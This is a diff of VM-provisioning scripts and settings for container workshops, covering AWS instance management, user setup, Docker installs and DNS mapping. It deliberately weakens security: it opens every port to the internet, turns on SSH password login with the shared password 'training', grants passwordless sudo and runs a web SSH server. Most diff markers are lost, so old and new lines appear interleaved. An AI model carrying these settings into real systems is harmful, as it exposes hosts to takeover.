    aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
    info "To deploy Docker on these instances, you can run:"
    info "$0 deploy $TAG"
    info "To terminate these instances, you can run:"
    info "$0 stop $TAG"
}

_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
_cmd_stop() {
    TAG=$1
    need_tag $TAG
    aws_kill_instances_by_tag $TAG
    need_tag
    infra_stop
    echo stopped > tags/$TAG/status
}

_cmd test "Run tests (pre-flight checks) on a batch of VMs"
_cmd tags "List groups of VMs known locally"
_cmd_tags() {
    (
    cd tags
    echo "[#] [Status] [Tag] [Infra]" \
        | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
    for tag in *; do
        if [ -f $tag/ips.txt ]; then
            count="$(wc -l < $tag/ips.txt)"
        else
            count="?"
        fi
        if [ -f $tag/status ]; then
            status="$(cat $tag/status)"
        else
            status="?"
        fi
        if [ -f $tag/infra.sh ]; then
            infra="$(basename $(readlink $tag/infra.sh))"
        else
            infra="?"
        fi
        echo "$count $status $tag $infra" \
            | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
    done
    )
}

_cmd test "Run tests (pre-flight checks) on a group of VMs"
_cmd_test() {
    TAG=$1
    need_tag $TAG
    test_tag $TAG
    need_tag
    test_tag
}

###
_cmd tmux "Log into the first node and start a tmux server"
_cmd_tmux() {
    TAG=$1
    need_tag
    IP=$(head -1 tags/$TAG/ips.txt)
    info "Opening ssh+tmux with $IP"
    rm -f /tmp/tmux-$UID/default
    ssh -t -L /tmp/tmux-$UID/default:/tmp/tmux-1001/default docker@$IP tmux new-session -As 0
}

_cmd helmprom "Install Helm and Prometheus"
_cmd_helmprom() {
    TAG=$1
    need_tag
    pssh "
    if i_am_first_node; then
        sudo -u docker -H helm repo add stable https://kubernetes-charts.storage.googleapis.com/
        sudo -u docker -H helm install prometheus stable/prometheus \
            --namespace kube-system \
            --set server.service.type=NodePort \
            --set server.service.nodePort=30090 \
            --set server.persistentVolume.enabled=false \
            --set alertmanager.enabled=false
    fi"
}

# Sometimes, weave fails to come up on some nodes.
# Symptom: the pods on a node are unreachable (they don't even ping).
# Remedy: wipe out Weave state and delete weave pod on that node.
# Specifically, identify the weave pod that is defective, then:
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
# kubectl -n kube-system delete pod weave-net-XXXXX
_cmd weavetest "Check that weave seems properly setup"
_cmd_weavetest() {
    TAG=$1
    need_tag
    pssh "
    kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
    xargs -I POD kubectl -n kube-system exec POD -c weave -- \
    sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
}
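
# Spelled out, the remedy from the comment above would be run as follows
# (the pod name is a placeholder for the defective weave pod):
#
#     POD=weave-net-XXXXX
#     kubectl -n kube-system exec $POD -c weave -- rm /weavedb/weave-netdata.db
#     kubectl -n kube-system delete pod $POD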

_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
_cmd_webssh() {
    TAG=$1
    need_tag
    pssh "
    sudo apt-get update &&
    sudo apt-get install python-tornado python-paramiko -y"
    pssh "
    [ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
    pssh "
    for KEYFILE in /etc/ssh/*.pub; do
        read a b c < \$KEYFILE; echo localhost \$a \$b
    done > webssh/known_hosts"
    pssh "cat >webssh.service <<EOF
[Unit]
Description=webssh

[Install]
WantedBy=multi-user.target

[Service]
WorkingDirectory=/home/ubuntu/webssh
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
User=nobody
Group=nogroup
Restart=always
EOF"
    pssh "
    sudo systemctl enable \$PWD/webssh.service &&
    sudo systemctl start webssh.service"
}

_cmd www "Run a web server to access card HTML and PDF"
_cmd_www() {
    cd www
    IPADDR=$(curl -sL canihazip.com/s)
    info "The following files are available:"
    for F in *; do
        echo "http://$IPADDR:8000/$F"
    done
    info "Press Ctrl-C to stop server."
    python3 -m http.server
}

greet() {
    IAMUSER=$(aws iam get-user --query 'User.UserName')
    info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
}

link_tag() {
    TAG=$1
    need_tag $TAG
    IPS_FILE=tags/$TAG/ips.txt
    need_ips_file $IPS_FILE
    ln -sf $IPS_FILE ips.txt
}

pull_tag() {
    TAG=$1
    need_tag $TAG
    link_tag $TAG
    if [ ! -s $IPS_FILE ]; then
        die "Nonexistent or empty IPs file $IPS_FILE."
    fi

    # Pre-pull a bunch of images
    pssh --timeout 900 'for I in \
        debian:latest \
        ubuntu:latest \
        fedora:latest \
        centos:latest \
        elasticsearch:2 \
        postgres \
        redis \
        alpine \
        registry \
        nicolaka/netshoot \
        jpetazzo/trainingwheels \
        golang \
        training/namer \
        dockercoins/hasher \
        dockercoins/rng \
        dockercoins/webui \
        dockercoins/worker \
        logstash \
        prom/node-exporter \
        google/cadvisor \
        dockersamples/visualizer \
        nathanleclaire/redisonrails; do
        sudo -u docker docker pull $I
    done'

    info "Finished pulling images for $TAG."
    info "You may now want to run:"
    info "$0 cards $TAG <settings/somefile.yaml>"
}

wait_until_tag_is_running() {
    max_retry=50
    TAG=$1
    COUNT=$2
    i=0
    done_count=0
    while [[ $done_count -lt $COUNT ]]; do
        let "i += 1"
        info "$(printf "%d/%d instances online" $done_count $COUNT)"
        done_count=$(aws ec2 describe-instances \
            --filters "Name=instance-state-name,Values=running" \
            "Name=tag:Name,Values=$TAG" \
            --query "Reservations[*].Instances[*].State.Name" \
            | tr "\t" "\n" \
            | wc -l)

        if [[ $i -gt $max_retry ]]; then
            die "Timed out while waiting for instance creation (after $max_retry retries)"
        fi
        sleep 1
    done
}

tag_is_reachable() {
    TAG=$1
    need_tag $TAG
    link_tag $TAG
    pssh -t 5 true 2>&1 >/dev/null
}

test_tag() {
    TAG=$1
    ips_file=tags/$TAG/ips.txt
    info "Picking a random IP address in $ips_file to run tests."
    n=$((1 + $RANDOM % $(wc -l <$ips_file)))
    ip=$(head -n $n $ips_file | tail -n 1)
    ip=$(shuf -n1 $ips_file)
    test_vm $ip
    info "Tests complete."
}

@@ -484,8 +708,8 @@ test_vm() {
    for cmd in "hostname" \
        "whoami" \
        "hostname -i" \
        "cat /tmp/node" \
        "cat /tmp/ipv4" \
        "ls -l /usr/local/bin/i_am_first_node" \
        "grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
        "cat /etc/hosts" \
        "hostnamectl status" \
        "docker version | grep Version -B1" \

@@ -545,18 +769,3 @@ sync_keys() {
        info "Using existing key $AWS_KEY_NAME."
    fi
}

get_token() {
    if [ -z $USER ]; then
        export USER=anonymous
    fi
    date +%Y-%m-%d-%H-%M-$USER
}

describe_tag() {
    # Display instance details and reachability/status information
    TAG=$1
    need_tag $TAG
    aws_display_instances_by_tag $TAG
    aws_display_instance_statuses_by_tag $TAG
}

prepare-vms/lib/infra.sh (new file, 30 lines)
@@ -0,0 +1,30 @@
# Default stub functions for infrastructure libraries.
# When loading an infrastructure library, these functions will be overridden.

infra_list() {
    warning "infra_list is unsupported on $INFRACLASS."
}

infra_quotas() {
    warning "infra_quotas is unsupported on $INFRACLASS."
}

infra_start() {
    warning "infra_start is unsupported on $INFRACLASS."
}

infra_stop() {
    warning "infra_stop is unsupported on $INFRACLASS."
}

infra_quotas() {
    warning "infra_quotas is unsupported on $INFRACLASS."
}

infra_opensg() {
    warning "infra_opensg is unsupported on $INFRACLASS."
}

infra_disableaddrchecks() {
    warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}

prepare-vms/lib/infra/aws.sh (new file, 216 lines)
@@ -0,0 +1,216 @@
infra_list() {
    aws_display_tags
}

infra_quotas() {
    greet

    max_instances=$(aws ec2 describe-account-attributes \
        --attribute-names max-instances \
        --query 'AccountAttributes[*][AttributeValues]')
    info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."

    # Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
    # If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
    # Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
    info "Available regions:"
    aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}

infra_start() {
    COUNT=$1

    # Print our AWS username, to ease the pain of credential-juggling
    greet

    # Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
    key_name=$(sync_keys)

    AMI=$(aws_get_ami) # Retrieve the AWS image ID
    if [ -z "$AMI" ]; then
        die "I could not find which AMI to use in this region. Try another region?"
    fi
    AWS_KEY_NAME=$(make_key_name)
    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}

    sep "Starting instances"
    info " Count: $COUNT"
    info " Region: $AWS_DEFAULT_REGION"
    info " Token/tag: $TAG"
    info " AMI: $AMI"
    info " Key name: $AWS_KEY_NAME"
    info " Instance type: $AWS_INSTANCE_TYPE"
    result=$(aws ec2 run-instances \
        --key-name $AWS_KEY_NAME \
        --count $COUNT \
        --instance-type $AWS_INSTANCE_TYPE \
        --client-token $TAG \
        --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
        --image-id $AMI)
    reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
    info "Reservation ID: $reservation_id"
    sep

    # if instance creation succeeded, we should have some IDs
    IDS=$(aws_get_instance_ids_by_client_token $TAG)
    if [ -z "$IDS" ]; then
        die "Instance creation failed."
    fi

    # Tag these new instances with a tag that is the same as the token
    aws_tag_instances $TAG $TAG

    # Wait until EC2 API tells us that the instances are running
    wait_until_tag_is_running $TAG $COUNT

    aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
}

infra_stop() {
    aws_kill_instances_by_tag
}

infra_opensg() {
    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol icmp \
        --port -1 \
        --cidr 0.0.0.0/0

    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol udp \
        --port 0-65535 \
        --cidr 0.0.0.0/0

    aws ec2 authorize-security-group-ingress \
        --group-name default \
        --protocol tcp \
        --port 0-65535 \
        --cidr 0.0.0.0/0
}

infra_disableaddrchecks() {
    IDS=$(aws_get_instance_ids_by_tag $TAG)
    for ID in $IDS; do
        info "Disabling source/destination IP checks on: $ID"
        aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
    done
}

wait_until_tag_is_running() {
    max_retry=100
    i=0
    done_count=0
    while [[ $done_count -lt $COUNT ]]; do
        let "i += 1"
        info "$(printf "%d/%d instances online" $done_count $COUNT)"
        done_count=$(aws ec2 describe-instances \
            --filters "Name=tag:Name,Values=$TAG" \
            "Name=instance-state-name,Values=running" \
            --query "length(Reservations[].Instances[])")
        if [[ $i -gt $max_retry ]]; then
            die "Timed out while waiting for instance creation (after $max_retry retries)"
        fi
        sleep 1
    done
}
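
# Note that the JMESPath length() query counts the matching instances
# server-side, replacing the old State.Name + tr + wc -l pipeline; the
# standalone equivalent would be something like:
#
#     aws ec2 describe-instances \
#         --filters "Name=tag:Name,Values=$TAG" "Name=instance-state-name,Values=running" \
#         --query "length(Reservations[].Instances[])"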

aws_display_tags() {
    # Print all "Name" tags in our region with their instance count
    echo "[#] [Status] [Token] [Tag]" \
        | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
    aws ec2 describe-instances \
        --query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
        | tr -d "\r" \
        | uniq -c \
        | sort -k 3 \
        | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}

aws_get_tokens() {
    aws ec2 describe-instances --output text \
        --query 'Reservations[*].Instances[*].[ClientToken]' \
        | sort -u
}

aws_display_instance_statuses_by_tag() {
    IDS=$(aws ec2 describe-instances \
        --filters "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')

    aws ec2 describe-instance-status \
        --instance-ids $IDS \
        --query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
        --output table
}

aws_display_instances_by_tag() {
    result=$(aws ec2 describe-instances --output table \
        --filter "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].[ \
            InstanceId, \
            State.Name, \
            Tags[0].Value, \
            PublicIpAddress, \
            InstanceType \
            ]"
    )
    if [[ -z $result ]]; then
        die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
    else
        echo "$result"
    fi
}

aws_get_instance_ids_by_filter() {
    FILTER=$1
    aws ec2 describe-instances --filters $FILTER \
        --query Reservations[*].Instances[*].InstanceId \
        --output text | tr "\t" "\n" | tr -d "\r"
}

aws_get_instance_ids_by_client_token() {
    TOKEN=$1
    aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}

aws_get_instance_ids_by_tag() {
    aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}

aws_get_instance_ips_by_tag() {
    aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
        --output text \
        --query "Reservations[*].Instances[*].PublicIpAddress" \
        | tr "\t" "\n" \
        | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
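
# The sort flags matter here: a plain lexical sort would put 10.0.0.10
# before 10.0.0.9. For example:
#
#     printf "10.0.0.9\n10.0.0.10\n" | sort
#         # -> 10.0.0.10 first (lexical, wrong)
#     printf "10.0.0.9\n10.0.0.10\n" | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4
#         # -> 10.0.0.9 first (numeric, octet by octet)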

aws_kill_instances_by_tag() {
    IDS=$(aws_get_instance_ids_by_tag $TAG)
    if [ -z "$IDS" ]; then
        die "Invalid tag."
    fi

    info "Deleting instances with tag $TAG."

    aws ec2 terminate-instances --instance-ids $IDS \
        | grep ^TERMINATINGINSTANCES

    info "Deleted instances with tag $TAG."
}

aws_tag_instances() {
    OLD_TAG_OR_TOKEN=$1
    NEW_TAG=$2
    IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
    IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}

aws_get_ami() {
    ##VERSION##
    find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
}

prepare-vms/lib/infra/generic.sh (new file, 8 lines)
@@ -0,0 +1,8 @@
infra_start() {
    COUNT=$1
    info "You should now run your provisioning commands for $COUNT machines."
    info "Note: no machines have been automatically created!"
    info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
    info "(one IP address per line, without any comments or extra lines)."
    touch tags/$TAG/ips.txt
}

prepare-vms/lib/infra/openstack.sh (new file, 20 lines)
@@ -0,0 +1,20 @@
infra_start() {
    COUNT=$1

    cp terraform/*.tf tags/$TAG
    (
    cd tags/$TAG
    terraform init
    echo prefix = \"$TAG\" >> terraform.tfvars
    echo count = \"$COUNT\" >> terraform.tfvars
    terraform apply -auto-approve
    terraform output ip_addresses > ips.txt
    )
}

infra_stop() {
    (
    cd tags/$TAG
    terraform destroy -auto-approve
    )
}
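
# For a tag started this way, tags/$TAG/terraform.tfvars ends up containing
# something like (values are examples):
#
#     prefix = "2020-02-14-09-30-jerome"
#     count = "6"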

@@ -1,20 +1,15 @@
#!/usr/bin/env python
#!/usr/bin/env python3
import os
import sys
import yaml
import jinja2

def prettify(l):
    l = [ip.strip() for ip in l]
    ret = [ "node{}: <code>{}</code>".format(i+1, s) for (i, s) in zip(range(len(l)), l) ]
    return ret

# Read settings from user-provided settings file
SETTINGS = yaml.load(open(sys.argv[1]))

clustersize = SETTINGS["clustersize"]
context = yaml.safe_load(open(sys.argv[1]))

ips = list(open("ips.txt"))
clustersize = context["clustersize"]

print("---------------------------------------------")
print(" Number of IPs: {}".format(len(ips)))

@@ -30,21 +25,32 @@ while ips:
    ips = ips[clustersize:]
    clusters.append(cluster)

template_file_name = SETTINGS["cards_template"]
template = jinja2.Template(open(template_file_name).read())
context["clusters"] = clusters

template_file_name = context["cards_template"]
template_file_path = os.path.join(
    os.path.dirname(__file__),
    "..",
    "templates",
    template_file_name
)
template = jinja2.Template(open(template_file_path).read())
with open("ips.html", "w") as f:
    f.write(template.render(clusters=clusters, **SETTINGS))
    f.write(template.render(**context))
print("Generated ips.html")

try:
    import pdfkit
    paper_size = context["paper_size"]
    margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
    with open("ips.html") as f:
        pdfkit.from_file(f, "ips.pdf", options={
            "page-size": SETTINGS["paper_size"],
            "margin-top": SETTINGS["paper_margin"],
            "margin-bottom": SETTINGS["paper_margin"],
            "margin-left": SETTINGS["paper_margin"],
            "margin-right": SETTINGS["paper_margin"],
            "page-size": paper_size,
            "margin-top": margin,
            "margin-bottom": margin,
            "margin-left": margin,
            "margin-right": margin,
        })
    print("Generated ips.pdf")
except ImportError:

@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]

@@ -64,6 +65,15 @@ system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
SQRL""".format(ipv4))

# Bigger history, in a different file, and saved before executing each command
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export HISTSIZE=9999
export HISTFILESIZE=9999
shopt -s histappend
trap 'history -a' DEBUG
export HISTFILE=~/.history
SQRL""")

# Custom .vimrc
system("""sudo -u docker tee /home/docker/.vimrc <<SQRL
syntax on

@@ -72,8 +82,29 @@ set expandtab
set number
set shiftwidth=2
set softtabstop=2
set nowrap
SQRL""")

# Custom .tmux.conf
system(
    """sudo -u docker tee /home/docker/.tmux.conf <<SQRL
bind h select-pane -L
bind j select-pane -D
bind k select-pane -U
bind l select-pane -R

# Allow using mouse to switch panes
set -g mouse on

# Make scrolling with wheels work

bind -n WheelUpPane if-shell -F -t = "#{mouse_any_flag}" "send-keys -M" "if -Ft= '#{pane_in_mode}' 'send-keys -M' 'select-pane -t=; copy-mode -e; send-keys -M'"
bind -n WheelDownPane select-pane -t= \; send-keys -M

SQRL"""
)

# add docker user to sudoers and allow password authentication
system("""sudo tee /etc/sudoers.d/docker <<SQRL
docker ALL=(ALL) NOPASSWD:ALL

@@ -83,7 +114,8 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e

system("sudo service ssh restart")
system("sudo apt-get -q update")
system("sudo apt-get -qy install git jq python-pip")
system("sudo apt-get -qy install git jq")
system("sudo apt-get -qy install emacs-nox joe")

#######################
### DOCKER INSTALLS ###

@@ -98,7 +130,6 @@ system("sudo apt-get -q update")
system("sudo apt-get -qy install docker-ce")

### Install docker-compose
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
system("sudo chmod +x /usr/local/bin/docker-compose")
system("docker-compose version")

@@ -122,7 +153,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses

def makenames(addrs):
    return [ "node%s"%(i+1) for i in range(len(addrs)) ]
    return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]

while addresses:
    cluster = addresses[:CLUSTER_SIZE]

@@ -136,15 +167,21 @@ while addresses:
    print(cluster)

    mynode = cluster.index(ipv4) + 1
    system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
    system("echo node{} | sudo tee /etc/hostname".format(mynode))
    system("sudo hostname node{}".format(mynode))
    system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
    system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
    system("sudo -u docker mkdir -p /home/docker/.ssh")
    system("sudo -u docker touch /home/docker/.ssh/authorized_keys")

    # Create a convenience file to easily check if we're the first node
    if ipv4 == cluster[0]:
        # If I'm node1 and don't have a private key, generate one (with empty passphrase)
        system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
        # On the first node, if we don't have a private key, generate one (with empty passphrase)
        system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
    else:
        system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
    # Record the IPV4 and name of the first node
    system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
    system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))

FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

@@ -1,12 +1,17 @@
# This file can be sourced in order to directly run commands on
# a batch of VMs whose IPs are located in ips.txt of the directory in which
# a group of VMs whose IPs are located in ips.txt of the directory in which
# the command is run.

pssh() {
    HOSTFILE="ips.txt"
    if [ -z "$TAG" ]; then
        >/dev/stderr echo "Variable \$TAG is not set."
        return
    fi

    HOSTFILE="tags/$TAG/ips.txt"

    [ -f $HOSTFILE ] || {
        >/dev/stderr echo "No hostfile found at $HOSTFILE"
        >/dev/stderr echo "Hostfile $HOSTFILE not found."
        return
    }
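
# Usage is unchanged except that $TAG must now be set; for example
# (tag value hypothetical):
#
#     TAG=2020-02-14-09-30-jerome
#     pssh "sudo docker info | head -n 5"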

prepare-vms/lib/tailhist.html (new file, 42 lines)
@@ -0,0 +1,42 @@
<!DOCTYPE html>
<html>
<head>
<title>bash history</title>
<style>
#log {
    font: bold 24px courier;
}

#log div:last-child {
    background: yellow;
}
</style>
</head>
<body>

<div id="log"></div>

<script>
var ws = new WebSocket('ws://' + (location.host ? location.host : "localhost:8080") + "/");
var log = document.getElementById('log');
var echo = function(text) {
    var line = document.createElement('div');
    line.textContent = text;
    log.appendChild(line);
    line.scrollIntoView();
}
ws.onopen = function() {
    document.body.style.backgroundColor = '#cfc';
};
ws.onclose = function() {
    document.body.style.backgroundColor = '#fcc';
    echo("Disconnected from server. Try to reload this page?");
};
ws.onmessage = function(event) {
    echo(event.data);
};
</script>

</body>
</html>

prepare-vms/map-dns.py (new executable file, 49 lines)
@@ -0,0 +1,49 @@
#!/usr/bin/env python3
import os
import requests
import yaml

# configurable stuff
domains_file = "../../plentydomains/domains.txt"
config_file = os.path.join(
    os.environ["HOME"], ".config/gandi/config.yaml")
tag = "test"
apiurl = "https://dns.api.gandi.net/api/v5/domains"

# inferred stuff
domains = open(domains_file).read().split()
apikey = yaml.safe_load(open(config_file))["apirest"]["key"]
ips = open(f"tags/{tag}/ips.txt").read().split()
settings_file = f"tags/{tag}/settings.yaml"
clustersize = yaml.safe_load(open(settings_file))["clustersize"]

# now do the actual work
while domains and ips:
    domain = domains[0]
    domains = domains[1:]
    cluster = ips[:clustersize]
    ips = ips[clustersize:]
    print(f"{domain} => {cluster}")
    zone = ""
    node = 0
    for ip in cluster:
        node += 1
        zone += f"@ 300 IN A {ip}\n"
        zone += f"* 300 IN A {ip}\n"
        zone += f"node{node} 300 IN A {ip}\n"
    r = requests.put(
        f"{apiurl}/{domain}/records",
        headers={"x-api-key": apikey},
        data=zone)
    print(r.text)

    #r = requests.get(
    #    f"{apiurl}/{domain}/records",
    #    headers={"x-api-key": apikey},
    #    )

if domains:
    print(f"Good, we have {len(domains)} domains left.")

if ips:
    print(f"Crap, we have {len(ips)} IP addresses left.")
|
||||
23
prepare-vms/settings/admin-dmuc.yaml
Normal file
23
prepare-vms/settings/admin-dmuc.yaml
Normal file
@@ -0,0 +1,23 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
image:
|
||||
24
prepare-vms/settings/admin-kubenet.yaml
Normal file
24
prepare-vms/settings/admin-kubenet.yaml
Normal file
@@ -0,0 +1,24 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
clusternumber: 100
|
||||
image:
|
||||
24
prepare-vms/settings/admin-kuberouter.yaml
Normal file
24
prepare-vms/settings/admin-kuberouter.yaml
Normal file
@@ -0,0 +1,24 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
clusternumber: 200
|
||||
image:
|
||||
23
prepare-vms/settings/admin-test.yaml
Normal file
23
prepare-vms/settings/admin-test.yaml
Normal file
@@ -0,0 +1,23 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 3
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
image:
|
||||
@@ -1,5 +1,8 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 5
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: clusters.csv
|
||||
|
||||
@@ -3,24 +3,20 @@
# Number of VMs per cluster
clustersize: 5

# The hostname of each node will be clusterprefix + a number
clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: test

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.18.0
+compose_version: 1.24.1
machine_version: 0.13.0

# Password used to connect with the "docker user"
@@ -3,24 +3,20 @@
# Number of VMs per cluster
clustersize: 1

# The hostname of each node will be clusterprefix + a number
clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.22.0
+compose_version: 1.25.4
machine_version: 0.15.0

# Password used to connect with the "docker user"
22 prepare-vms/settings/jerome.yaml Normal file
@@ -0,0 +1,22 @@
# Number of VMs per cluster
clustersize: 4

# The hostname of each node will be clusterprefix + a number
clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.25.4
machine_version: 0.14.0

# Password used to connect with the "docker user"
docker_user_password: training
@@ -1,106 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
